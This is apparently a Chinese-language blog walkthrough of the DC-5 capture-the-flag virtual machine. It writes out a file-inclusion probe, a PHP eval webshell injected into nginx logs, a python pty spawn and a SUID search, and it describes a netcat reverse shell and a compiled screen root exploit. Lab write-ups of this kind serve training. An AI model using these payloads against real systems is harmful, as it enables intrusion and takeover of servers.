靶机DC-5

Posted 2021-09-03 Jach1n

DC-5

靶机下载地址：https://www.five86.com/dc-5.html

扫描网段探测靶机ip
​

访问下web站点 发现在contact提交后，每次提交完成后显示的年份都会发生变化

每次都会带上的查询的参数，可以尝试下能不能访问别的文件
​

原来显示年份的地方变成当前查询的文件的内容了
​

又看了下111端口，也没什么好利用的

还是回到站点上，通过查看nginx配置文件找到访问日志和错误日志的路径

?file=/etc/nginx/nginx.conf

访问access.log，然后在url出插入一句话，不能用post参数，然后在error日志中可以看到这条操作

?<?php eval($_REQUEST[\'admin\']);?>

然后使用蚁剑连接，连access.log和error.log都是可以的 将上面的url直接复制到蚁剑即可
连access.log建议把安全软件暂时关一下

http://your-ip/thankyou.php?file=/var/log/error.log

打开虚拟终端，然后nc弹到kali上

获取交互模式

python -c \'import pty;pty.spawn("/bin/sh")\'

参照DC1的提权方法，用find命令查看有sudo权限的指令

find / -perm -u=s -type f 2>/dev/null

试了下前面几个命令不太行 直接干screen，先搜索下漏洞

将脚本文件上传到靶机发现不能直接用，还需要处理下 脚本文件里会有一些说明

将这些文件放到tmp目录下，然后指定gcc命令编译，上图箭头所指的命令

完成后，这俩绿色儿的上传到靶机tmp目录，方法随意
​

然后再执行下列命令，#号别带上

提权成功

在root目录下找到flag